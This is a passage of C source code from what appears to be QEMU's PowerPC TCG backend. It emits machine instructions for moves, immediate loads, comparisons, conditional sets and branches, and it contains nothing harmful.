BO_COND_FALSE BO( 4) #define BO_ALWAYS BO(20) enum { CR_LT, CR_GT, CR_EQ, CR_SO }; static const uint32_t tcg_to_bc[] = { [TCG_COND_EQ] = BC | BI(7, CR_EQ) | BO_COND_TRUE, [TCG_COND_NE] = BC | BI(7, CR_EQ) | BO_COND_FALSE, [TCG_COND_LT] = BC | BI(7, CR_LT) | BO_COND_TRUE, [TCG_COND_GE] = BC | BI(7, CR_LT) | BO_COND_FALSE, [TCG_COND_LE] = BC | BI(7, CR_GT) | BO_COND_FALSE, [TCG_COND_GT] = BC | BI(7, CR_GT) | BO_COND_TRUE, [TCG_COND_LTU] = BC | BI(7, CR_LT) | BO_COND_TRUE, [TCG_COND_GEU] = BC | BI(7, CR_LT) | BO_COND_FALSE, [TCG_COND_LEU] = BC | BI(7, CR_GT) | BO_COND_FALSE, [TCG_COND_GTU] = BC | BI(7, CR_GT) | BO_COND_TRUE, }; /* The low bit here is set if the RA and RB fields must be inverted. */ static const uint32_t tcg_to_isel[] = { [TCG_COND_EQ] = ISEL | BC_(7, CR_EQ), [TCG_COND_NE] = ISEL | BC_(7, CR_EQ) | 1, [TCG_COND_LT] = ISEL | BC_(7, CR_LT), [TCG_COND_GE] = ISEL | BC_(7, CR_LT) | 1, [TCG_COND_LE] = ISEL | BC_(7, CR_GT) | 1, [TCG_COND_GT] = ISEL | BC_(7, CR_GT), [TCG_COND_LTU] = ISEL | BC_(7, CR_LT), [TCG_COND_GEU] = ISEL | BC_(7, CR_LT) | 1, [TCG_COND_LEU] = ISEL | BC_(7, CR_GT) | 1, [TCG_COND_GTU] = ISEL | BC_(7, CR_GT), }; static bool patch_reloc(tcg_insn_unit *code_ptr, int type, intptr_t value, intptr_t addend) { tcg_insn_unit *target; int16_t lo; int32_t hi; value += addend; target = (tcg_insn_unit *)value; switch (type) { case R_PPC_REL14: return reloc_pc14(code_ptr, target); case R_PPC_REL24: return reloc_pc24(code_ptr, target); case R_PPC_ADDR16: /* * We are (slightly) abusing this relocation type. In particular, * assert that the low 2 bits are zero, and do not modify them. * That way we can use this with LD et al that have opcode bits * in the low 2 bits of the insn. */ if ((value & 3) || value != (int16_t)value) { return false; } *code_ptr = (*code_ptr & ~0xfffc) | (value & 0xfffc); break; case R_PPC_ADDR32: /* * We are abusing this relocation type. Again, this points to * a pair of insns, lis + load. This is an absolute address * relocation for PPC32 so the lis cannot be removed. 
*/ lo = value; hi = value - lo; if (hi + lo != value) { return false; } code_ptr[0] = deposit32(code_ptr[0], 0, 16, hi >> 16); code_ptr[1] = deposit32(code_ptr[1], 0, 16, lo); break; default: g_assert_not_reached(); } return true; } static void tcg_out_mem_long(TCGContext *s, int opi, int opx, TCGReg rt, TCGReg base, tcg_target_long offset); static bool tcg_out_mov(TCGContext *s, TCGType type, TCGReg ret, TCGReg arg) { if (ret == arg) { return true; } switch (type) { case TCG_TYPE_I64: tcg_debug_assert(TCG_TARGET_REG_BITS == 64); /* fallthru */ case TCG_TYPE_I32: if (ret < TCG_REG_V0) { if (arg < TCG_REG_V0) { tcg_out32(s, OR | SAB(arg, ret, arg)); break; } else if (have_isa_2_07) { tcg_out32(s, (type == TCG_TYPE_I32 ? MFVSRWZ : MFVSRD) | VRT(arg) | RA(ret)); break; } else { /* Altivec does not support vector->integer moves. */ return false; } } else if (arg < TCG_REG_V0) { if (have_isa_2_07) { tcg_out32(s, (type == TCG_TYPE_I32 ? MTVSRWZ : MTVSRD) | VRT(ret) | RA(arg)); break; } else { /* Altivec does not support integer->vector moves. */ return false; } } /* fallthru */ case TCG_TYPE_V64: case TCG_TYPE_V128: tcg_debug_assert(ret >= TCG_REG_V0 && arg >= TCG_REG_V0); tcg_out32(s, VOR | VRT(ret) | VRA(arg) | VRB(arg)); break; default: g_assert_not_reached(); } return true; } static inline void tcg_out_rld(TCGContext *s, int op, TCGReg ra, TCGReg rs, int sh, int mb) { tcg_debug_assert(TCG_TARGET_REG_BITS == 64); sh = SH(sh & 0x1f) | (((sh >> 5) & 1) << 1); mb = MB64((mb >> 5) | ((mb << 1) & 0x3f)); tcg_out32(s, op | RA(ra) | RS(rs) | sh | mb); } static inline void tcg_out_rlw(TCGContext *s, int op, TCGReg ra, TCGReg rs, int sh, int mb, int me) { tcg_out32(s, op | RA(ra) | RS(rs) | SH(sh) | MB(mb) | ME(me)); } static inline void tcg_out_ext32u(TCGContext *s, TCGReg dst, TCGReg src) { tcg_out_rld(s, RLDICL, dst, src, 0, 32); } static inline void tcg_out_shli32(TCGContext *s, TCGReg dst, TCGReg src, int c) { tcg_out_rlw(s, RLWINM, dst, src, c, 0, 31 - c); } static inline void tcg_out_shli64(TCGContext *s, TCGReg dst, TCGReg src, int c) { tcg_out_rld(s, RLDICR, dst, src, c, 63 - c); } static inline void tcg_out_shri32(TCGContext *s, TCGReg dst, TCGReg src, int c) { tcg_out_rlw(s, RLWINM, dst, src, 32 - c, c, 31); } static inline void tcg_out_shri64(TCGContext *s, TCGReg dst, TCGReg src, int c) { tcg_out_rld(s, RLDICL, dst, src, 64 - c, c); } /* Emit a move into ret of arg, if it can be done in one insn. */ static bool tcg_out_movi_one(TCGContext *s, TCGReg ret, tcg_target_long arg) { if (arg == (int16_t)arg) { tcg_out32(s, ADDI | TAI(ret, 0, arg)); return true; } if (arg == (int32_t)arg && (arg & 0xffff) == 0) { tcg_out32(s, ADDIS | TAI(ret, 0, arg >> 16)); return true; } return false; } static void tcg_out_movi_int(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg, bool in_prologue) { intptr_t tb_diff; tcg_target_long tmp; int shift; tcg_debug_assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32); if (TCG_TARGET_REG_BITS == 64 && type == TCG_TYPE_I32) { arg = (int32_t)arg; } /* Load 16-bit immediates with one insn. */ if (tcg_out_movi_one(s, ret, arg)) { return; } /* Load addresses within the TB with one insn. */ tb_diff = arg - (intptr_t)s->code_gen_ptr; if (!in_prologue && USE_REG_TB && tb_diff == (int16_t)tb_diff) { tcg_out32(s, ADDI | TAI(ret, TCG_REG_TB, tb_diff)); return; } /* Load 32-bit immediates with two insns. Note that we've already eliminated bare ADDIS, so we know both insns are required. 
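       As an illustrative example (value invented for this note),
       arg = 0x1234ffff emits:
           lis ret, 0x1234        # ret = 0x12340000
           ori ret, ret, 0xffff   # ret = 0x1234ffff
       ORI zero-extends its immediate, so no carry fixup is needed
       even when bit 15 of arg is set.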
*/ if (TCG_TARGET_REG_BITS == 32 || arg == (int32_t)arg) { tcg_out32(s, ADDIS | TAI(ret, 0, arg >> 16)); tcg_out32(s, ORI | SAI(ret, ret, arg)); return; } if (arg == (uint32_t)arg && !(arg & 0x8000)) { tcg_out32(s, ADDI | TAI(ret, 0, arg)); tcg_out32(s, ORIS | SAI(ret, ret, arg >> 16)); return; } /* Load masked 16-bit value. */ if (arg > 0 && (arg & 0x8000)) { tmp = arg | 0x7fff; if ((tmp & (tmp + 1)) == 0) { int mb = clz64(tmp + 1) + 1; tcg_out32(s, ADDI | TAI(ret, 0, arg)); tcg_out_rld(s, RLDICL, ret, ret, 0, mb); return; } } /* Load common masks with 2 insns. */ shift = ctz64(arg); tmp = arg >> shift; if (tmp == (int16_t)tmp) { tcg_out32(s, ADDI | TAI(ret, 0, tmp)); tcg_out_shli64(s, ret, ret, shift); return; } shift = clz64(arg); if (tcg_out_movi_one(s, ret, arg << shift)) { tcg_out_shri64(s, ret, ret, shift); return; } /* Load addresses within 2GB of TB with 2 (or rarely 3) insns. */ if (!in_prologue && USE_REG_TB && tb_diff == (int32_t)tb_diff) { tcg_out_mem_long(s, ADDI, ADD, ret, TCG_REG_TB, tb_diff); return; } /* Use the constant pool, if possible. */ if (!in_prologue && USE_REG_TB) { new_pool_label(s, arg, R_PPC_ADDR16, s->code_ptr, -(intptr_t)s->code_gen_ptr); tcg_out32(s, LD | TAI(ret, TCG_REG_TB, 0)); return; } tmp = arg >> 31 >> 1; tcg_out_movi(s, TCG_TYPE_I32, ret, tmp); if (tmp) { tcg_out_shli64(s, ret, ret, 32); } if (arg & 0xffff0000) { tcg_out32(s, ORIS | SAI(ret, ret, arg >> 16)); } if (arg & 0xffff) { tcg_out32(s, ORI | SAI(ret, ret, arg)); } } static void tcg_out_dupi_vec(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long val) { uint32_t load_insn; int rel, low; intptr_t add; low = (int8_t)val; if (low >= -16 && low < 16) { if (val == (tcg_target_long)dup_const(MO_8, low)) { tcg_out32(s, VSPLTISB | VRT(ret) | ((val & 31) << 16)); return; } if (val == (tcg_target_long)dup_const(MO_16, low)) { tcg_out32(s, VSPLTISH | VRT(ret) | ((val & 31) << 16)); return; } if (val == (tcg_target_long)dup_const(MO_32, low)) { tcg_out32(s, VSPLTISW | VRT(ret) | ((val & 31) << 16)); return; } } if (have_isa_3_00 && val == (tcg_target_long)dup_const(MO_8, val)) { tcg_out32(s, XXSPLTIB | VRT(ret) | ((val & 0xff) << 11)); return; } /* * Otherwise we must load the value from the constant pool. */ if (USE_REG_TB) { rel = R_PPC_ADDR16; add = -(intptr_t)s->code_gen_ptr; } else { rel = R_PPC_ADDR32; add = 0; } if (have_vsx) { load_insn = type == TCG_TYPE_V64 ? 
LXSDX : LXVDSX; load_insn |= VRT(ret) | RB(TCG_REG_TMP1); if (TCG_TARGET_REG_BITS == 64) { new_pool_label(s, val, rel, s->code_ptr, add); } else { new_pool_l2(s, rel, s->code_ptr, add, val, val); } } else { load_insn = LVX | VRT(ret) | RB(TCG_REG_TMP1); if (TCG_TARGET_REG_BITS == 64) { new_pool_l2(s, rel, s->code_ptr, add, val, val); } else { new_pool_l4(s, rel, s->code_ptr, add, val, val, val, val); } } if (USE_REG_TB) { tcg_out32(s, ADDI | TAI(TCG_REG_TMP1, 0, 0)); load_insn |= RA(TCG_REG_TB); } else { tcg_out32(s, ADDIS | TAI(TCG_REG_TMP1, 0, 0)); tcg_out32(s, ADDI | TAI(TCG_REG_TMP1, TCG_REG_TMP1, 0)); } tcg_out32(s, load_insn); } static void tcg_out_movi(TCGContext *s, TCGType type, TCGReg ret, tcg_target_long arg) { switch (type) { case TCG_TYPE_I32: case TCG_TYPE_I64: tcg_debug_assert(ret < TCG_REG_V0); tcg_out_movi_int(s, type, ret, arg, false); break; case TCG_TYPE_V64: case TCG_TYPE_V128: tcg_debug_assert(ret >= TCG_REG_V0); tcg_out_dupi_vec(s, type, ret, arg); break; default: g_assert_not_reached(); } } static bool mask_operand(uint32_t c, int *mb, int *me) { uint32_t lsb, test; /* Accept a bit pattern like: 0....01....1 1....10....0 0..01..10..0 Keep track of the transitions. */ if (c == 0 || c == -1) { return false; } test = c; lsb = test & -test; test += lsb; if (test & (test - 1)) { return false; } *me = clz32(lsb); *mb = test ? clz32(test & -test) + 1 : 0; return true; } static bool mask64_operand(uint64_t c, int *mb, int *me) { uint64_t lsb; if (c == 0) { return false; } lsb = c & -c; /* Accept 1..10..0. */ if (c == -lsb) { *mb = 0; *me = clz64(lsb); return true; } /* Accept 0..01..1. */ if (lsb == 1 && (c & (c + 1)) == 0) { *mb = clz64(c + 1) + 1; *me = 63; return true; } return false; } static void tcg_out_andi32(TCGContext *s, TCGReg dst, TCGReg src, uint32_t c) { int mb, me; if (mask_operand(c, &mb, &me)) { tcg_out_rlw(s, RLWINM, dst, src, 0, mb, me); } else if ((c & 0xffff) == c) { tcg_out32(s, ANDI | SAI(src, dst, c)); return; } else if ((c & 0xffff0000) == c) { tcg_out32(s, ANDIS | SAI(src, dst, c >> 16)); return; } else { tcg_out_movi(s, TCG_TYPE_I32, TCG_REG_R0, c); tcg_out32(s, AND | SAB(src, dst, TCG_REG_R0)); } } static void tcg_out_andi64(TCGContext *s, TCGReg dst, TCGReg src, uint64_t c) { int mb, me; tcg_debug_assert(TCG_TARGET_REG_BITS == 64); if (mask64_operand(c, &mb, &me)) { if (mb == 0) { tcg_out_rld(s, RLDICR, dst, src, 0, me); } else { tcg_out_rld(s, RLDICL, dst, src, 0, mb); } } else if ((c & 0xffff) == c) { tcg_out32(s, ANDI | SAI(src, dst, c)); return; } else if ((c & 0xffff0000) == c) { tcg_out32(s, ANDIS | SAI(src, dst, c >> 16)); return; } else { tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_R0, c); tcg_out32(s, AND | SAB(src, dst, TCG_REG_R0)); } } static void tcg_out_zori32(TCGContext *s, TCGReg dst, TCGReg src, uint32_t c, int op_lo, int op_hi) { if (c >> 16) { tcg_out32(s, op_hi | SAI(src, dst, c >> 16)); src = dst; } if (c & 0xffff) { tcg_out32(s, op_lo | SAI(src, dst, c)); src = dst; } } static void tcg_out_ori32(TCGContext *s, TCGReg dst, TCGReg src, uint32_t c) { tcg_out_zori32(s, dst, src, c, ORI, ORIS); } static void tcg_out_xori32(TCGContext *s, TCGReg dst, TCGReg src, uint32_t c) { tcg_out_zori32(s, dst, src, c, XORI, XORIS); } static void tcg_out_b(TCGContext *s, int mask, tcg_insn_unit *target) { ptrdiff_t disp = tcg_pcrel_diff(s, target); if (in_range_b(disp)) { tcg_out32(s, B | (disp & 0x3fffffc) | mask); } else { tcg_out_movi(s, TCG_TYPE_PTR, TCG_REG_R0, (uintptr_t)target); tcg_out32(s, MTSPR | RS(TCG_REG_R0) | CTR); tcg_out32(s, BCCTR 
| BO_ALWAYS | mask);
    }
}

static void tcg_out_mem_long(TCGContext *s, int opi, int opx, TCGReg rt,
                             TCGReg base, tcg_target_long offset)
{
    tcg_target_long orig = offset, l0, l1, extra = 0, align = 0;
    bool is_int_store = false;
    TCGReg rs = TCG_REG_TMP1;

    switch (opi) {
    case LD: case LWA:
        align = 3;
        /* FALLTHRU */
    default:
        if (rt > TCG_REG_R0 && rt < TCG_REG_V0) {
            rs = rt;
            break;
        }
        break;
    case LXSD:
    case STXSD:
        align = 3;
        break;
    case LXV:
    case STXV:
        align = 15;
        break;
    case STD:
        align = 3;
        /* FALLTHRU */
    case STB: case STH: case STW:
        is_int_store = true;
        break;
    }

    /* For unaligned, or very large offsets, use the indexed form. */
    if (offset & align || offset != (int32_t)offset || opi == 0) {
        if (rs == base) {
            rs = TCG_REG_R0;
        }
        tcg_debug_assert(!is_int_store || rs != rt);
        tcg_out_movi(s, TCG_TYPE_PTR, rs, orig);
        tcg_out32(s, opx | TAB(rt & 31, base, rs));
        return;
    }

    l0 = (int16_t)offset;
    offset = (offset - l0) >> 16;
    l1 = (int16_t)offset;

    if (l1 < 0 && orig >= 0) {
        extra = 0x4000;
        l1 = (int16_t)(offset - 0x4000);
    }
    if (l1) {
        tcg_out32(s, ADDIS | TAI(rs, base, l1));
        base = rs;
    }
    if (extra) {
        tcg_out32(s, ADDIS | TAI(rs, base, extra));
        base = rs;
    }
    if (opi != ADDI || base != rt || l0 != 0) {
        tcg_out32(s, opi | TAI(rt & 31, base, l0));
    }
}

static void tcg_out_vsldoi(TCGContext *s, TCGReg ret,
                           TCGReg va, TCGReg vb, int shb)
{
    tcg_out32(s, VSLDOI | VRT(ret) | VRA(va) | VRB(vb) | (shb << 6));
}

static void tcg_out_ld(TCGContext *s, TCGType type, TCGReg ret,
                       TCGReg base, intptr_t offset)
{
    int shift;

    switch (type) {
    case TCG_TYPE_I32:
        if (ret < TCG_REG_V0) {
            tcg_out_mem_long(s, LWZ, LWZX, ret, base, offset);
            break;
        }
        if (have_isa_2_07 && have_vsx) {
            tcg_out_mem_long(s, 0, LXSIWZX, ret, base, offset);
            break;
        }
        tcg_debug_assert((offset & 3) == 0);
        tcg_out_mem_long(s, 0, LVEWX, ret, base, offset);
        shift = (offset - 4) & 0xc;
        if (shift) {
            tcg_out_vsldoi(s, ret, ret, ret, shift);
        }
        break;
    case TCG_TYPE_I64:
        if (ret < TCG_REG_V0) {
            tcg_debug_assert(TCG_TARGET_REG_BITS == 64);
            tcg_out_mem_long(s, LD, LDX, ret, base, offset);
            break;
        }
        /* fallthru */
    case TCG_TYPE_V64:
        tcg_debug_assert(ret >= TCG_REG_V0);
        if (have_vsx) {
            tcg_out_mem_long(s, have_isa_3_00 ? LXSD : 0, LXSDX,
                             ret, base, offset);
            break;
        }
        tcg_debug_assert((offset & 7) == 0);
        tcg_out_mem_long(s, 0, LVX, ret, base, offset & -16);
        if (offset & 8) {
            tcg_out_vsldoi(s, ret, ret, ret, 8);
        }
        break;
    case TCG_TYPE_V128:
        tcg_debug_assert(ret >= TCG_REG_V0);
        tcg_debug_assert((offset & 15) == 0);
        tcg_out_mem_long(s, have_isa_3_00 ? LXV : 0, LVX,
                         ret, base, offset);
        break;
    default:
        g_assert_not_reached();
    }
}

static void tcg_out_st(TCGContext *s, TCGType type, TCGReg arg,
                       TCGReg base, intptr_t offset)
{
    int shift;

    switch (type) {
    case TCG_TYPE_I32:
        if (arg < TCG_REG_V0) {
            tcg_out_mem_long(s, STW, STWX, arg, base, offset);
            break;
        }
        if (have_isa_2_07 && have_vsx) {
            tcg_out_mem_long(s, 0, STXSIWX, arg, base, offset);
            break;
        }
        tcg_debug_assert((offset & 3) == 0);
        shift = (offset - 4) & 0xc;
        if (shift) {
            tcg_out_vsldoi(s, TCG_VEC_TMP1, arg, arg, shift);
            arg = TCG_VEC_TMP1;
        }
        tcg_out_mem_long(s, 0, STVEWX, arg, base, offset);
        break;
    case TCG_TYPE_I64:
        if (arg < TCG_REG_V0) {
            tcg_debug_assert(TCG_TARGET_REG_BITS == 64);
            tcg_out_mem_long(s, STD, STDX, arg, base, offset);
            break;
        }
        /* fallthru */
    case TCG_TYPE_V64:
        tcg_debug_assert(arg >= TCG_REG_V0);
        if (have_vsx) {
            tcg_out_mem_long(s, have_isa_3_00 ?
STXSD : 0, STXSDX, arg, base, offset); break; } tcg_debug_assert((offset & 7) == 0); if (offset & 8) { tcg_out_vsldoi(s, TCG_VEC_TMP1, arg, arg, 8); arg = TCG_VEC_TMP1; } tcg_out_mem_long(s, 0, STVEWX, arg, base, offset); tcg_out_mem_long(s, 0, STVEWX, arg, base, offset + 4); break; case TCG_TYPE_V128: tcg_debug_assert(arg >= TCG_REG_V0); tcg_out_mem_long(s, have_isa_3_00 ? STXV : 0, STVX, arg, base, offset); break; default: g_assert_not_reached(); } } static inline bool tcg_out_sti(TCGContext *s, TCGType type, TCGArg val, TCGReg base, intptr_t ofs) { return false; } static void tcg_out_cmp(TCGContext *s, int cond, TCGArg arg1, TCGArg arg2, int const_arg2, int cr, TCGType type) { int imm; uint32_t op; tcg_debug_assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32); /* Simplify the comparisons below wrt CMPI. */ if (type == TCG_TYPE_I32) { arg2 = (int32_t)arg2; } switch (cond) { case TCG_COND_EQ: case TCG_COND_NE: if (const_arg2) { if ((int16_t) arg2 == arg2) { op = CMPI; imm = 1; break; } else if ((uint16_t) arg2 == arg2) { op = CMPLI; imm = 1; break; } } op = CMPL; imm = 0; break; case TCG_COND_LT: case TCG_COND_GE: case TCG_COND_LE: case TCG_COND_GT: if (const_arg2) { if ((int16_t) arg2 == arg2) { op = CMPI; imm = 1; break; } } op = CMP; imm = 0; break; case TCG_COND_LTU: case TCG_COND_GEU: case TCG_COND_LEU: case TCG_COND_GTU: if (const_arg2) { if ((uint16_t) arg2 == arg2) { op = CMPLI; imm = 1; break; } } op = CMPL; imm = 0; break; default: tcg_abort(); } op |= BF(cr) | ((type == TCG_TYPE_I64) << 21); if (imm) { tcg_out32(s, op | RA(arg1) | (arg2 & 0xffff)); } else { if (const_arg2) { tcg_out_movi(s, type, TCG_REG_R0, arg2); arg2 = TCG_REG_R0; } tcg_out32(s, op | RA(arg1) | RB(arg2)); } } static void tcg_out_setcond_eq0(TCGContext *s, TCGType type, TCGReg dst, TCGReg src) { if (type == TCG_TYPE_I32) { tcg_out32(s, CNTLZW | RS(src) | RA(dst)); tcg_out_shri32(s, dst, dst, 5); } else { tcg_out32(s, CNTLZD | RS(src) | RA(dst)); tcg_out_shri64(s, dst, dst, 6); } } static void tcg_out_setcond_ne0(TCGContext *s, TCGReg dst, TCGReg src) { /* X != 0 implies X + -1 generates a carry. Extra addition trickery means: R = X-1 + ~X + C = X-1 + (-X+1) + C = C. */ if (dst != src) { tcg_out32(s, ADDIC | TAI(dst, src, -1)); tcg_out32(s, SUBFE | TAB(dst, dst, src)); } else { tcg_out32(s, ADDIC | TAI(TCG_REG_R0, src, -1)); tcg_out32(s, SUBFE | TAB(dst, TCG_REG_R0, src)); } } static TCGReg tcg_gen_setcond_xor(TCGContext *s, TCGReg arg1, TCGArg arg2, bool const_arg2) { if (const_arg2) { if ((uint32_t)arg2 == arg2) { tcg_out_xori32(s, TCG_REG_R0, arg1, arg2); } else { tcg_out_movi(s, TCG_TYPE_I64, TCG_REG_R0, arg2); tcg_out32(s, XOR | SAB(arg1, TCG_REG_R0, TCG_REG_R0)); } } else { tcg_out32(s, XOR | SAB(arg1, TCG_REG_R0, arg2)); } return TCG_REG_R0; } static void tcg_out_setcond(TCGContext *s, TCGType type, TCGCond cond, TCGArg arg0, TCGArg arg1, TCGArg arg2, int const_arg2) { int crop, sh; tcg_debug_assert(TCG_TARGET_REG_BITS == 64 || type == TCG_TYPE_I32); /* Ignore high bits of a potential constant arg2. */ if (type == TCG_TYPE_I32) { arg2 = (uint32_t)arg2; } /* Handle common and trivial cases before handling anything else. 
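       (Explanatory note, not in the original comment: the eq0 helper
       above relies on cntlzw/cntlzd returning the full operand width
       only for x == 0, so shifting right by log2(width) yields the
       0/1 result directly; the ne0 helper keys off the carry from
       x + (-1), which is set iff x != 0.)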
*/ if (arg2 == 0) { switch (cond) { case TCG_COND_EQ: tcg_out_setcond_eq0(s, type, arg0, arg1); return; case TCG_COND_NE: if (TCG_TARGET_REG_BITS == 64 && type == TCG_TYPE_I32) { tcg_out_ext32u(s, TCG_REG_R0, arg1); arg1 = TCG_REG_R0; } tcg_out_setcond_ne0(s, arg0, arg1); return; case TCG_COND_GE: tcg_out32(s, NOR | SAB(arg1, arg0, arg1)); arg1 = arg0; /* FALLTHRU */ case TCG_COND_LT: /* Extract the sign bit. */ if (type == TCG_TYPE_I32) { tcg_out_shri32(s, arg0, arg1, 31); } else { tcg_out_shri64(s, arg0, arg1, 63); } return; default: break; } } /* If we have ISEL, we can implement everything with 3 or 4 insns. All other cases below are also at least 3 insns, so speed up the code generator by not considering them and always using ISEL. */ if (have_isel) { int isel, tab; tcg_out_cmp(s, cond, arg1, arg2, const_arg2, 7, type); isel = tcg_to_isel[cond]; tcg_out_movi(s, type, arg0, 1); if (isel & 1) { /* arg0 = (bc ? 0 : 1) */ tab = TAB(arg0, 0, arg0); isel &= ~1; } else { /* arg0 = (bc ? 1 : 0) */ tcg_out_movi(s, type, TCG_REG_R0, 0); tab = TAB(arg0, arg0, TCG_REG_R0); } tcg_out32(s, isel | tab); return; } switch (cond) { case TCG_COND_EQ: arg1 = tcg_gen_setcond_xor(s, arg1, arg2, const_arg2); tcg_out_setcond_eq0(s, type, arg0, arg1); return; case TCG_COND_NE: arg1 = tcg_gen_setcond_xor(s, arg1, arg2, const_arg2); /* Discard the high bits only once, rather than both inputs. */ if (TCG_TARGET_REG_BITS == 64 && type == TCG_TYPE_I32) { tcg_out_ext32u(s, TCG_REG_R0, arg1); arg1 = TCG_REG_R0; } tcg_out_setcond_ne0(s, arg0, arg1); return; case TCG_COND_GT: case TCG_COND_GTU: sh = 30; crop = 0; goto crtest; case TCG_COND_LT: case TCG_COND_LTU: sh = 29; crop = 0; goto crtest; case TCG_COND_GE: case TCG_COND_GEU: sh = 31; crop = CRNOR | BT(7, CR_EQ) | BA(7, CR_LT) | BB(7, CR_LT); goto crtest; case TCG_COND_LE: case TCG_COND_LEU: sh = 31; crop = CRNOR | BT(7, CR_EQ) | BA(7, CR_GT) | BB(7, CR_GT); crtest: tcg_out_cmp(s, cond, arg1, arg2, const_arg2, 7, type); if (crop) { tcg_out32(s, crop); } tcg_out32(s, MFOCRF | RT(TCG_REG_R0) | FXM(7)); tcg_out_rlw(s, RLWINM, arg0, TCG_REG_R0, sh, 31, 31); break; default: tcg_abort(); } } static void tcg_out_bc(TCGContext *s, int bc, TCGLabel *l) { if (l->has_value) { bc |= reloc_pc14_val(s->code_ptr, l->u.value_ptr); } else { tcg_out_reloc(s, s->code_ptr, R_PPC_REL14, l, 0); } tcg_out32(s, bc); } static void tcg_out_brcond(TCGContext *s, TCGCond cond, TCGArg arg1, TCGArg arg2, int const_arg2, TCGLabel *l, TCGType type) { tcg_out_cmp(s, cond, arg1, arg2, const_arg2, 7, type); tcg_out_bc(s, tcg_to_bc[cond], l); } static void tcg_out_movcond(TCGContext *s, TCGType type, TCGCond cond, TCGArg dest, TCGArg c1, TCGArg c2, TCGArg v1, TCGArg v2, bool const_c2) { /* If for some reason both inputs are zero, don't produce bad code. */ if (v1 == 0 && v2 == 0) { tcg_out_movi(s, type, dest, 0); return; } tcg_out_cmp(s, cond, c1, c2, const_c2, 7, type); if (have_isel) { int isel = tcg_to_isel[cond]; /* Swap the V operands if the operation indicates inversion. */ if (isel & 1) { int t = v1; v1 = v2; v2 = t; isel &= ~1; } /* V1 == 0 is handled by isel; V2 == 0 must be handled by hand. 
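           (Explanatory note: isel reads its first source from the RA
           field, where register number 0 denotes the constant 0; the
           RB field has no such special case, so only V2 == 0 needs a
           real zero materialized in R0.)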
*/ if (v2 == 0) { tcg_out_movi(s, type, TCG_REG_R0, 0); } tcg_out32(s, isel | TAB(dest, v1, v2)); } else { if (dest == v2) { cond = tcg_invert_cond(cond); v2 = v1; } else if (dest != v1) { if (v1 == 0) { tcg_out_movi(s, type, dest, 0); } else { tcg_out_mov(s, type, dest, v1); } } /* Branch forward over one insn */ tcg_out32(s, tcg_to_bc[cond] | 8); if (v2 == 0) { tcg_out_movi(s, type, dest, 0); } else { tcg_out_mov(s, type, dest, v2); } } } static void tcg_out_cntxz(TCGContext *s, TCGType type, uint32_t opc, TCGArg a0, TCGArg a1, TCGArg a2, bool const_a2) { if (const_a2 && a2 == (type == TCG_TYPE_I32 ? 32 : 64)) { tcg_out32(s, opc | RA(a0) | RS(a1)); } else { tcg_out_cmp(s, TCG_COND_EQ, a1, 0, 1, 7, type); /* Note that the only other valid constant for a2 is 0. */ if (have_isel) { tcg_out32(s, opc | RA(TCG_REG_R0) | RS(a1)); tcg_out32(s, tcg_to_isel[TCG_COND_EQ] | TAB(a0, a2, TCG_REG_R0)); } else if (!const_a2 && a0 == a2) { tcg_out32(s, tcg_to_bc[TCG_COND_EQ] | 8); tcg_out32(s, opc | RA(a0) | RS(a1)); } else { tcg_out32(s, opc | RA(a0) | RS(a1)); tcg_out32(s, tcg_to_bc[TCG_COND_NE] | 8); if (const_a2) { tcg_out_movi(s, type, a0, 0); } else { tcg_out_mov(s, type, a0, a2); } } } } static void tcg_out_cmp2(TCGContext *s, const TCGArg *args, const int *const_args) { static const struct { uint8_t bit1, bit2; } bits[] = { [TCG_COND_LT ] = { CR_LT, CR_LT }, [TCG_COND_LE ] = { CR_LT, CR_GT }, [TCG_COND_GT ] = { CR_GT, CR_GT }, [TCG_COND_GE ] = { CR_GT, CR_LT }, [TCG_COND_LTU] = { CR_LT, CR_LT }, [TCG_COND_LEU] = { CR_LT, CR_GT }, [TCG_COND_GTU] = { CR_GT, CR_GT }, [TCG_COND_GEU] = { CR_GT, CR_LT }, }; TCGCond cond = args[4], cond2; TCGArg al, ah, bl, bh; int blconst, bhconst; int op, bit1, bit2; al = args[0]; ah = args[1]; bl = args[2]; bh = args[3]; blconst = const_args[2]; bhconst = const_args[3]; switch (cond) { case TCG_COND_EQ: op = CRAND; goto do_equality; case TCG_COND_NE: op = CRNAND; do_equality: tcg_out_cmp(s, cond, al, bl, blconst, 6, TCG_TYPE_I32); tcg_out_cmp(s, cond, ah, bh, bhconst, 7, TCG_TYPE_I32); tcg_out32(s, op | BT(7, CR_EQ) | BA(6, CR_EQ) | BB(7, CR_EQ)); break; case TCG_COND_LT: case TCG_COND_LE: case TCG_COND_GT: case TCG_COND_GE: case TCG_COND_LTU: case TCG_COND_LEU: case TCG_COND_GTU: case TCG_COND_GEU: bit1 = bits[cond].bit1; bit2 = bits[cond].bit2; op = (bit1 != bit2 ? 
CRANDC : CRAND); cond2 = tcg_unsigned_cond(cond); tcg_out_cmp(s, cond, ah, bh, bhconst, 6, TCG_TYPE_I32); tcg_out_cmp(s, cond2, al, bl, blconst, 7, TCG_TYPE_I32); tcg_out32(s, op | BT(7, CR_EQ) | BA(6, CR_EQ) | BB(7, bit2)); tcg_out32(s, CROR | BT(7, CR_EQ) | BA(6, bit1) | BB(7, CR_EQ)); break; default: tcg_abort(); } } static void tcg_out_setcond2(TCGContext *s, const TCGArg *args, const int *const_args) { tcg_out_cmp2(s, args + 1, const_args + 1); tcg_out32(s, MFOCRF | RT(TCG_REG_R0) | FXM(7)); tcg_out_rlw(s, RLWINM, args[0], TCG_REG_R0, 31, 31, 31); } static void tcg_out_brcond2 (TCGContext *s, const TCGArg *args, const int *const_args) { tcg_out_cmp2(s, args, const_args); tcg_out_bc(s, BC | BI(7, CR_EQ) | BO_COND_TRUE, arg_label(args[5])); } static void tcg_out_mb(TCGContext *s, TCGArg a0) { uint32_t insn = HWSYNC; a0 &= TCG_MO_ALL; if (a0 == TCG_MO_LD_LD) { insn = LWSYNC; } else if (a0 == TCG_MO_ST_ST) { insn = EIEIO; } tcg_out32(s, insn); } void tb_target_set_jmp_target(uintptr_t tc_ptr, uintptr_t jmp_addr, uintptr_t addr) { if (TCG_TARGET_REG_BITS == 64) { tcg_insn_unit i1, i2; intptr_t tb_diff = addr - tc_ptr; intptr_t br_diff = addr - (jmp_addr + 4); uint64_t pair; /* This does not exercise the range of the branch, but we do still need to be able to load 